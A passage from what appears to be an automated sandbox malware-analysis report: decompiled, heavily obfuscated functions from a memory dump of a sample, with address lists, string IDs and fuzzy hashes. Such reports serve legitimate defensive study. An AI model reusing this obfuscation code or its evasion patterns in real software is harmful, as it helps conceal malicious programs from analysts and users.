                                                                                                                                                                                                                    						if(_t87 >= 0x41 && _t87 <= 0x5a) {
                                                                                                                                                                                                                    							_t87 = _t87 + 0x20;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_a4 = _t87;
                                                                                                                                                                                                                    						_t109 =  &(_t109[1]);
                                                                                                                                                                                                                    						_a4 = _a4 + _t104;
                                                                                                                                                                                                                    						_a4 = _a4 + _t107;
                                                                                                                                                                                                                    						_a4 = _a4 - _t89;
                                                                                                                                                                                                                    						_t93 = 0xe;
                                                                                                                                                                                                                    					} while ( *_t109 != 0);
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				return _a4;
                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                    0x00a7aaf6
                                                                                                                                                                                                                    0x00a7aafa
                                                                                                                                                                                                                    0x00a7aafe
                                                                                                                                                                                                                    0x00a7ab02
                                                                                                                                                                                                                    0x00a7ab05
                                                                                                                                                                                                                    0x00a7ab0a
                                                                                                                                                                                                                    0x00a7ab15
                                                                                                                                                                                                                    0x00a7ab27
                                                                                                                                                                                                                    0x00a7ab2c
                                                                                                                                                                                                                    0x00a7ab32
                                                                                                                                                                                                                    0x00a7ab3a
                                                                                                                                                                                                                    0x00a7ab42
                                                                                                                                                                                                                    0x00a7ab4a
                                                                                                                                                                                                                    0x00a7ab56
                                                                                                                                                                                                                    0x00a7ab59
                                                                                                                                                                                                                    0x00a7ab62
                                                                                                                                                                                                                    0x00a7ab66
                                                                                                                                                                                                                    0x00a7ab6e
                                                                                                                                                                                                                    0x00a7ab76
                                                                                                                                                                                                                    0x00a7ab80
                                                                                                                                                                                                                    0x00a7ab84
                                                                                                                                                                                                                    0x00a7ab89
                                                                                                                                                                                                                    0x00a7ab94
                                                                                                                                                                                                                    0x00a7ab9c
                                                                                                                                                                                                                    0x00a7ab9c
                                                                                                                                                                                                                    0x00a7aba2
                                                                                                                                                                                                                    0x00a7abaa
                                                                                                                                                                                                                    0x00a7abb8
                                                                                                                                                                                                                    0x00a7abc1
                                                                                                                                                                                                                    0x00a7abc5
                                                                                                                                                                                                                    0x00a7abd5
                                                                                                                                                                                                                    0x00a7abdd
                                                                                                                                                                                                                    0x00a7abe7
                                                                                                                                                                                                                    0x00a7abe9
                                                                                                                                                                                                                    0x00a7abed
                                                                                                                                                                                                                    0x00a7abf2
                                                                                                                                                                                                                    0x00a7ac02
                                                                                                                                                                                                                    0x00a7ac05
                                                                                                                                                                                                                    0x00a7ac0a
                                                                                                                                                                                                                    0x00a7ac11
                                                                                                                                                                                                                    0x00a7ac11
                                                                                                                                                                                                                    0x00a7ac14
                                                                                                                                                                                                                    0x00a7ac18
                                                                                                                                                                                                                    0x00a7ac1b
                                                                                                                                                                                                                    0x00a7ac1f
                                                                                                                                                                                                                    0x00a7ac23
                                                                                                                                                                                                                    0x00a7ac29
                                                                                                                                                                                                                    0x00a7ac2a
                                                                                                                                                                                                                    0x00a7ac34
                                                                                                                                                                                                                    0x00a7ac3c

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: QE9$QE9$j-J
                                                                                                                                                                                                                    • API String ID: 0-707052143
                                                                                                                                                                                                                    • Opcode ID: 9d8fd5ec193e3ce556b9bb5cc84c3fac733ff370a1c5b48f10cb65a17b306b39
                                                                                                                                                                                                                    • Instruction ID: e9343684744af3304eb186f6a71b50f82abc9ee73114260e790ec7bed3ee7e31
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d8fd5ec193e3ce556b9bb5cc84c3fac733ff370a1c5b48f10cb65a17b306b39
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C53102B2908342ABD314DF24D48940BBFE1FBD5794F21CC1EF0A986260D3B4D9888B93
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E00A6601A() {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				unsigned int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				unsigned int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                    				signed int _t82;
                                                                                                                                                                                                                    				signed int _t83;
                                                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v32 = _v32 & 0x00000000;
                                                                                                                                                                                                                    				_v44 = 0x3122bb;
                                                                                                                                                                                                                    				_v40 = 0x7c2546;
                                                                                                                                                                                                                    				_v36 = 0xc493a9;
                                                                                                                                                                                                                    				_v20 = 0xbc45b9;
                                                                                                                                                                                                                    				_v20 = _v20 << 2;
                                                                                                                                                                                                                    				_t82 = 0x4f;
                                                                                                                                                                                                                    				_v20 = _v20 * 0xd;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x263fed3b;
                                                                                                                                                                                                                    				_v16 = 0xf7107d;
                                                                                                                                                                                                                    				_v16 = _v16 << 0x10;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xffffa9af;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x1078d293;
                                                                                                                                                                                                                    				_v28 = 0x144e5a;
                                                                                                                                                                                                                    				_v28 = _v28 >> 0xf;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0xf0ccceac;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0xf0cbd224;
                                                                                                                                                                                                                    				_v24 = 0xf91505;
                                                                                                                                                                                                                    				_v24 = _v24 / _t82;
                                                                                                                                                                                                                    				_v24 = _v24 >> 8;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x0000915e;
                                                                                                                                                                                                                    				_v12 = 0x730e55;
                                                                                                                                                                                                                    				_v12 = _v12 << 0xf;
                                                                                                                                                                                                                    				_t83 = 0x4a;
                                                                                                                                                                                                                    				_v12 = _v12 / _t83;
                                                                                                                                                                                                                    				_v12 = _v12 >> 9;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x000114e2;
                                                                                                                                                                                                                    				_v8 = 0x365129;
                                                                                                                                                                                                                    				_t52 =  &_v8; // 0x365129
                                                                                                                                                                                                                    				_t84 = 0xc;
                                                                                                                                                                                                                    				_v8 =  *_t52 / _t84;
                                                                                                                                                                                                                    				_v8 = _v8 | 0xc7a75bff;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xc7ad39d6;
                                                                                                                                                                                                                    				E00A7F1AF();
                                                                                                                                                                                                                    				E00A76D52();
                                                                                                                                                                                                                    				return _v28;
                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                    0x00a66020
                                                                                                                                                                                                                    0x00a66026
                                                                                                                                                                                                                    0x00a6602d
                                                                                                                                                                                                                    0x00a66034
                                                                                                                                                                                                                    0x00a6603b
                                                                                                                                                                                                                    0x00a66042
                                                                                                                                                                                                                    0x00a6604c
                                                                                                                                                                                                                    0x00a6604f
                                                                                                                                                                                                                    0x00a66052
                                                                                                                                                                                                                    0x00a66059
                                                                                                                                                                                                                    0x00a66060
                                                                                                                                                                                                                    0x00a66064
                                                                                                                                                                                                                    0x00a6606b
                                                                                                                                                                                                                    0x00a66072
                                                                                                                                                                                                                    0x00a66079
                                                                                                                                                                                                                    0x00a6607d
                                                                                                                                                                                                                    0x00a66084
                                                                                                                                                                                                                    0x00a6608b
                                                                                                                                                                                                                    0x00a66099
                                                                                                                                                                                                                    0x00a6609c
                                                                                                                                                                                                                    0x00a660a0
                                                                                                                                                                                                                    0x00a660a7
                                                                                                                                                                                                                    0x00a660ae
                                                                                                                                                                                                                    0x00a660b5
                                                                                                                                                                                                                    0x00a660ba
                                                                                                                                                                                                                    0x00a660bf
                                                                                                                                                                                                                    0x00a660c3
                                                                                                                                                                                                                    0x00a660ca
                                                                                                                                                                                                                    0x00a660d1
                                                                                                                                                                                                                    0x00a660d4
                                                                                                                                                                                                                    0x00a660d7
                                                                                                                                                                                                                    0x00a660da
                                                                                                                                                                                                                    0x00a660e1
                                                                                                                                                                                                                    0x00a660ee
                                                                                                                                                                                                                    0x00a66102
                                                                                                                                                                                                                    0x00a6610d

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                    • String ID: )Q6$;?&$F%|
                                                                                                                                                                                                                    • API String ID: 621844428-3246844339
                                                                                                                                                                                                                    • Opcode ID: 59eef6361389d164ba994717e0136f265895ba3e40b918aa097916d35cd84b8e
                                                                                                                                                                                                                    • Instruction ID: 1c8f3bb3cdd824cf1d2a89b3dfbd8ce9ab8230878ff1b48f131f5ad02594a352
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59eef6361389d164ba994717e0136f265895ba3e40b918aa097916d35cd84b8e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51210371E0120AEBCF08DFE4D98A5EEBBB1FB40704F2080A9D015BA250D3B44B558F80
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                                                                                    			E00A6A833() {
                                                                                                                                                                                                                    				signed int _v4;
                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				void* _t260;
                                                                                                                                                                                                                    				intOrPtr* _t261;
                                                                                                                                                                                                                    				signed int _t269;
                                                                                                                                                                                                                    				intOrPtr* _t271;
                                                                                                                                                                                                                    				signed int _t272;
                                                                                                                                                                                                                    				signed int _t273;
                                                                                                                                                                                                                    				signed int _t274;
                                                                                                                                                                                                                    				signed int _t275;
                                                                                                                                                                                                                    				signed int _t276;
                                                                                                                                                                                                                    				signed int _t277;
                                                                                                                                                                                                                    				void* _t278;
                                                                                                                                                                                                                    				void* _t305;
                                                                                                                                                                                                                    				signed int* _t309;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t309 =  &_v108;
                                                                                                                                                                                                                    				_v36 = 0x2f0988;
                                                                                                                                                                                                                    				_v36 = _v36 + 0xffffd547;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x802edece;
                                                                                                                                                                                                                    				_v20 = 0xb90103;
                                                                                                                                                                                                                    				_v20 = _v20 + 0x3224;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x00b93325;
                                                                                                                                                                                                                    				_v40 = 0x3c2cc0;
                                                                                                                                                                                                                    				_v40 = _v40 + 0xffff4fb2;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x0033f598;
                                                                                                                                                                                                                    				_v108 = 0xc46433;
                                                                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                                                                    				_v108 = _v108 * 0x3a;
                                                                                                                                                                                                                    				_t305 = 0x1ac7d53;
                                                                                                                                                                                                                    				_v108 = _v108 << 7;
                                                                                                                                                                                                                    				_v108 = _v108 << 7;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0xace9ea30;
                                                                                                                                                                                                                    				_v44 = 0xf27289;
                                                                                                                                                                                                                    				_t272 = 0x36;
                                                                                                                                                                                                                    				_v44 = _v44 * 0x44;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x4063045c;
                                                                                                                                                                                                                    				_v64 = 0x3f5370;
                                                                                                                                                                                                                    				_v64 = _v64 | 0x562ef8ca;
                                                                                                                                                                                                                    				_v64 = _v64 * 0x39;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x3438de6c;
                                                                                                                                                                                                                    				_v96 = 0xa2c288;
                                                                                                                                                                                                                    				_v96 = _v96 + 0x2a2;
                                                                                                                                                                                                                    				_v96 = _v96 / _t272;
                                                                                                                                                                                                                    				_v96 = _v96 + 0xffff2045;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0x0008f8f4;
                                                                                                                                                                                                                    				_v24 = 0x7403ce;
                                                                                                                                                                                                                    				_v24 = _v24 + 0xffffc9b3;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x00704f9e;
                                                                                                                                                                                                                    				_v100 = 0x8fbc49;
                                                                                                                                                                                                                    				_v100 = _v100 | 0xf0093aa9;
                                                                                                                                                                                                                    				_v100 = _v100 >> 9;
                                                                                                                                                                                                                    				_v100 = _v100 + 0x1520;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0x00767cd2;
                                                                                                                                                                                                                    				_v104 = 0x27874e;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x00622318;
                                                                                                                                                                                                                    				_v104 = _v104 + 0xf0ca;
                                                                                                                                                                                                                    				_v104 = _v104 << 1;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x008754da;
                                                                                                                                                                                                                    				_v28 = 0x389490;
                                                                                                                                                                                                                    				_v28 = _v28 + 0xcb32;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x0036148c;
                                                                                                                                                                                                                    				_v32 = 0xdebf86;
                                                                                                                                                                                                                    				_t273 = 0x18;
                                                                                                                                                                                                                    				_v32 = _v32 / _t273;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x0005b90f;
                                                                                                                                                                                                                    				_v52 = 0xf63914;
                                                                                                                                                                                                                    				_t274 = 0x24;
                                                                                                                                                                                                                    				_v52 = _v52 / _t274;
                                                                                                                                                                                                                    				_t275 = 0x7c;
                                                                                                                                                                                                                    				_v52 = _v52 / _t275;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x0006d0e1;
                                                                                                                                                                                                                    				_v56 = 0xa73a3a;
                                                                                                                                                                                                                    				_v56 = _v56 << 0x10;
                                                                                                                                                                                                                    				_t276 = 0x49;
                                                                                                                                                                                                                    				_t269 = _v4;
                                                                                                                                                                                                                    				_v56 = _v56 * 0x65;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0xf8ec4a4f;
                                                                                                                                                                                                                    				_v60 = 0x985bda;
                                                                                                                                                                                                                    				_v60 = _v60 * 0x63;
                                                                                                                                                                                                                    				_v60 = _v60 * 0x5a;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0xb6c45b7d;
                                                                                                                                                                                                                    				_v16 = 0xcb5e8f;
                                                                                                                                                                                                                    				_v16 = _v16 << 0x10;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x5e8ff08a;
                                                                                                                                                                                                                    				_v88 = 0x98bd39;
                                                                                                                                                                                                                    				_v88 = _v88 << 0xb;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0xf2e6b8aa;
                                                                                                                                                                                                                    				_v88 = _v88 << 8;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x0f7718e3;
                                                                                                                                                                                                                    				_v92 = 0x13b7ad;
                                                                                                                                                                                                                    				_v92 = _v92 | 0xbc4562ad;
                                                                                                                                                                                                                    				_v92 = _v92 + 0xffff0121;
                                                                                                                                                                                                                    				_v92 = _v92 * 0x31;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x0cae6b27;
                                                                                                                                                                                                                    				_v48 = 0x7c04a3;
                                                                                                                                                                                                                    				_v48 = _v48 / _t276;
                                                                                                                                                                                                                    				_v48 = _v48 >> 0xf;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x0006abe2;
                                                                                                                                                                                                                    				_v76 = 0xd5aac6;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0xee273383;
                                                                                                                                                                                                                    				_t277 = 0x47;
                                                                                                                                                                                                                    				_v76 = _v76 / _t277;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0xe7b8c434;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0xe4ed1325;
                                                                                                                                                                                                                    				_v80 = 0xec6d10;
                                                                                                                                                                                                                    				_v80 = _v80 + 0xb6ee;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0xfd3508d7;
                                                                                                                                                                                                                    				_v80 = _v80 | 0xdcc3bce3;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0xfdd5fd93;
                                                                                                                                                                                                                    				_v84 = 0xad459f;
                                                                                                                                                                                                                    				_v84 = _v84 * 0x23;
                                                                                                                                                                                                                    				_v84 = _v84 << 1;
                                                                                                                                                                                                                    				_v84 = _v84 * 0x65;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0xb145a992;
                                                                                                                                                                                                                    				_v12 = 0x911d9;
                                                                                                                                                                                                                    				_v12 = _v12 + 0xffff0821;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0004d96f;
                                                                                                                                                                                                                    				_v68 = 0x6b85a4;
                                                                                                                                                                                                                    				_v68 = _v68 + 0xffff8739;
                                                                                                                                                                                                                    				_v68 = _v68 | 0x4411df93;
                                                                                                                                                                                                                    				_v68 = _v68 + 0x99a0;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x44752383;
                                                                                                                                                                                                                    				_v72 = 0x9d906a;
                                                                                                                                                                                                                    				_v72 = _v72 * 0x54;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0xd8ac228c;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0xeb17448c;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					_t278 = 0x5c;
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						_t260 = 0x2b40056;
                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                    							L3:
                                                                                                                                                                                                                    							if(_t305 == 0x1ac7d53) {
                                                                                                                                                                                                                    								_t305 = 0xe9dfc98;
                                                                                                                                                                                                                    								goto L15;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(_t305 == _t260) {
                                                                                                                                                                                                                    								_t261 = E00A70A2A(_v48, _v76, _v8, _v80, _t269, _v84);
                                                                                                                                                                                                                    								_t309 =  &(_t309[4]);
                                                                                                                                                                                                                    								__eflags = _t261;
                                                                                                                                                                                                                    								_t305 = 0x3ae6714;
                                                                                                                                                                                                                    								_v4 = 0 | __eflags == 0x00000000;
                                                                                                                                                                                                                    								goto L1;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(_t305 == 0x3ae6714) {
                                                                                                                                                                                                                    								E00A7B133(_v12, _v68, _v8, _v72);
                                                                                                                                                                                                                    								L18:
                                                                                                                                                                                                                    								return _v4;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(_t305 == 0xe9dfc98) {
                                                                                                                                                                                                                    								_t271 =  *0xa83b38 + 0xc;
                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                    									__eflags =  *_t271 - _t278;
                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									_t271 = _t271 + 2;
                                                                                                                                                                                                                    									__eflags = _t271;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								_t269 = _t271 + 2;
                                                                                                                                                                                                                    								_t305 = 0xef4335d;
                                                                                                                                                                                                                    								_t260 = 0x2b40056;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t316 = _t305 - 0xef4335d;
                                                                                                                                                                                                                    							if(_t305 == 0xef4335d) {
                                                                                                                                                                                                                    								_push(_v64);
                                                                                                                                                                                                                    								_push(_v44);
                                                                                                                                                                                                                    								_push(_v108);
                                                                                                                                                                                                                    								E00A71031(_v96, _v20, _v24, 0xa6114c, _v100, _v104, _v28,  &_v8, _v32, _v52, _v56, 0xa6114c, 0xa6114c, _v60, 0xa6114c, 0xa6114c, _v36, E00A81E60(0xa6114c, _v40, _t316));
                                                                                                                                                                                                                    								_t305 =  ==  ? 0x2b40056 : 0x4311337;
                                                                                                                                                                                                                    								E00A7D6DF(_v16, _t264, _v88, _v92);
                                                                                                                                                                                                                    								_t309 =  &(_t309[0x15]);
                                                                                                                                                                                                                    								_t260 = 0x2b40056;
                                                                                                                                                                                                                    								_t278 = 0x5c;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                                    						} while (_t305 != 0x4311337);
                                                                                                                                                                                                                    						goto L18;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}











































                                                                                                                                                                                                                    0x00a6a833
                                                                                                                                                                                                                    0x00a6a836
                                                                                                                                                                                                                    0x00a6a840
                                                                                                                                                                                                                    0x00a6a84a
                                                                                                                                                                                                                    0x00a6a852
                                                                                                                                                                                                                    0x00a6a85a
                                                                                                                                                                                                                    0x00a6a862
                                                                                                                                                                                                                    0x00a6a86a
                                                                                                                                                                                                                    0x00a6a872
                                                                                                                                                                                                                    0x00a6a87a
                                                                                                                                                                                                                    0x00a6a882
                                                                                                                                                                                                                    0x00a6a889
                                                                                                                                                                                                                    0x00a6a895
                                                                                                                                                                                                                    0x00a6a899
                                                                                                                                                                                                                    0x00a6a89e
                                                                                                                                                                                                                    0x00a6a8a3
                                                                                                                                                                                                                    0x00a6a8a8
                                                                                                                                                                                                                    0x00a6a8b0
                                                                                                                                                                                                                    0x00a6a8bf
                                                                                                                                                                                                                    0x00a6a8c2
                                                                                                                                                                                                                    0x00a6a8c6
                                                                                                                                                                                                                    0x00a6a8ce
                                                                                                                                                                                                                    0x00a6a8d6
                                                                                                                                                                                                                    0x00a6a8e3
                                                                                                                                                                                                                    0x00a6a8e7
                                                                                                                                                                                                                    0x00a6a8ef
                                                                                                                                                                                                                    0x00a6a8f7
                                                                                                                                                                                                                    0x00a6a907
                                                                                                                                                                                                                    0x00a6a90b
                                                                                                                                                                                                                    0x00a6a913
                                                                                                                                                                                                                    0x00a6a91b
                                                                                                                                                                                                                    0x00a6a923
                                                                                                                                                                                                                    0x00a6a92b
                                                                                                                                                                                                                    0x00a6a933
                                                                                                                                                                                                                    0x00a6a93b
                                                                                                                                                                                                                    0x00a6a943
                                                                                                                                                                                                                    0x00a6a948
                                                                                                                                                                                                                    0x00a6a950
                                                                                                                                                                                                                    0x00a6a958
                                                                                                                                                                                                                    0x00a6a960
                                                                                                                                                                                                                    0x00a6a968
                                                                                                                                                                                                                    0x00a6a970
                                                                                                                                                                                                                    0x00a6a974
                                                                                                                                                                                                                    0x00a6a97c
                                                                                                                                                                                                                    0x00a6a984
                                                                                                                                                                                                                    0x00a6a98c
                                                                                                                                                                                                                    0x00a6a994
                                                                                                                                                                                                                    0x00a6a9a0
                                                                                                                                                                                                                    0x00a6a9a5
                                                                                                                                                                                                                    0x00a6a9ab
                                                                                                                                                                                                                    0x00a6a9b3
                                                                                                                                                                                                                    0x00a6a9bf
                                                                                                                                                                                                                    0x00a6a9c4
                                                                                                                                                                                                                    0x00a6a9ce
                                                                                                                                                                                                                    0x00a6a9d1
                                                                                                                                                                                                                    0x00a6a9d5
                                                                                                                                                                                                                    0x00a6a9dd
                                                                                                                                                                                                                    0x00a6a9e5
                                                                                                                                                                                                                    0x00a6a9f3
                                                                                                                                                                                                                    0x00a6a9f6
                                                                                                                                                                                                                    0x00a6a9ff
                                                                                                                                                                                                                    0x00a6aa03
                                                                                                                                                                                                                    0x00a6aa0b
                                                                                                                                                                                                                    0x00a6aa18
                                                                                                                                                                                                                    0x00a6aa21
                                                                                                                                                                                                                    0x00a6aa25
                                                                                                                                                                                                                    0x00a6aa2d
                                                                                                                                                                                                                    0x00a6aa35
                                                                                                                                                                                                                    0x00a6aa3a
                                                                                                                                                                                                                    0x00a6aa42
                                                                                                                                                                                                                    0x00a6aa4a
                                                                                                                                                                                                                    0x00a6aa4f
                                                                                                                                                                                                                    0x00a6aa57
                                                                                                                                                                                                                    0x00a6aa5c
                                                                                                                                                                                                                    0x00a6aa64
                                                                                                                                                                                                                    0x00a6aa6c
                                                                                                                                                                                                                    0x00a6aa74
                                                                                                                                                                                                                    0x00a6aa81
                                                                                                                                                                                                                    0x00a6aa85
                                                                                                                                                                                                                    0x00a6aa8d
                                                                                                                                                                                                                    0x00a6aa9d
                                                                                                                                                                                                                    0x00a6aaa1
                                                                                                                                                                                                                    0x00a6aaa6
                                                                                                                                                                                                                    0x00a6aaae
                                                                                                                                                                                                                    0x00a6aab6
                                                                                                                                                                                                                    0x00a6aac2
                                                                                                                                                                                                                    0x00a6aac5
                                                                                                                                                                                                                    0x00a6aac9
                                                                                                                                                                                                                    0x00a6aad1
                                                                                                                                                                                                                    0x00a6aad9
                                                                                                                                                                                                                    0x00a6aae1
                                                                                                                                                                                                                    0x00a6aae9
                                                                                                                                                                                                                    0x00a6aaf1
                                                                                                                                                                                                                    0x00a6aaf9
                                                                                                                                                                                                                    0x00a6ab01
                                                                                                                                                                                                                    0x00a6ab0e
                                                                                                                                                                                                                    0x00a6ab12
                                                                                                                                                                                                                    0x00a6ab1b
                                                                                                                                                                                                                    0x00a6ab1f
                                                                                                                                                                                                                    0x00a6ab27
                                                                                                                                                                                                                    0x00a6ab2f
                                                                                                                                                                                                                    0x00a6ab37
                                                                                                                                                                                                                    0x00a6ab3f
                                                                                                                                                                                                                    0x00a6ab47
                                                                                                                                                                                                                    0x00a6ab4f
                                                                                                                                                                                                                    0x00a6ab57
                                                                                                                                                                                                                    0x00a6ab5f
                                                                                                                                                                                                                    0x00a6ab67
                                                                                                                                                                                                                    0x00a6ab74
                                                                                                                                                                                                                    0x00a6ab78
                                                                                                                                                                                                                    0x00a6ab88
                                                                                                                                                                                                                    0x00a6ab90
                                                                                                                                                                                                                    0x00a6ab90
                                                                                                                                                                                                                    0x00a6ab92
                                                                                                                                                                                                                    0x00a6ab93
                                                                                                                                                                                                                    0x00a6ab93
                                                                                                                                                                                                                    0x00a6ab98
                                                                                                                                                                                                                    0x00a6ab98
                                                                                                                                                                                                                    0x00a6ab9e
                                                                                                                                                                                                                    0x00a6acba
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6acba
                                                                                                                                                                                                                    0x00a6aba6
                                                                                                                                                                                                                    0x00a6ac9d
                                                                                                                                                                                                                    0x00a6aca4
                                                                                                                                                                                                                    0x00a6aca7
                                                                                                                                                                                                                    0x00a6aca9
                                                                                                                                                                                                                    0x00a6acb1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6acb1
                                                                                                                                                                                                                    0x00a6abb2
                                                                                                                                                                                                                    0x00a6acda
                                                                                                                                                                                                                    0x00a6ace1
                                                                                                                                                                                                                    0x00a6acec
                                                                                                                                                                                                                    0x00a6acec
                                                                                                                                                                                                                    0x00a6abba
                                                                                                                                                                                                                    0x00a6ac6b
                                                                                                                                                                                                                    0x00a6ac73
                                                                                                                                                                                                                    0x00a6ac73
                                                                                                                                                                                                                    0x00a6ac76
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6ac70
                                                                                                                                                                                                                    0x00a6ac70
                                                                                                                                                                                                                    0x00a6ac70
                                                                                                                                                                                                                    0x00a6ac78
                                                                                                                                                                                                                    0x00a6ac7b
                                                                                                                                                                                                                    0x00a6ab93
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6ab93
                                                                                                                                                                                                                    0x00a6abc0
                                                                                                                                                                                                                    0x00a6abc6
                                                                                                                                                                                                                    0x00a6abcc
                                                                                                                                                                                                                    0x00a6abd5
                                                                                                                                                                                                                    0x00a6abd9
                                                                                                                                                                                                                    0x00a6ac2e
                                                                                                                                                                                                                    0x00a6ac50
                                                                                                                                                                                                                    0x00a6ac53
                                                                                                                                                                                                                    0x00a6ac58
                                                                                                                                                                                                                    0x00a6ac5b
                                                                                                                                                                                                                    0x00a6ac62
                                                                                                                                                                                                                    0x00a6ac62
                                                                                                                                                                                                                    0x00a6acbc
                                                                                                                                                                                                                    0x00a6acbc
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6acc8
                                                                                                                                                                                                                    0x00a6ab93

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
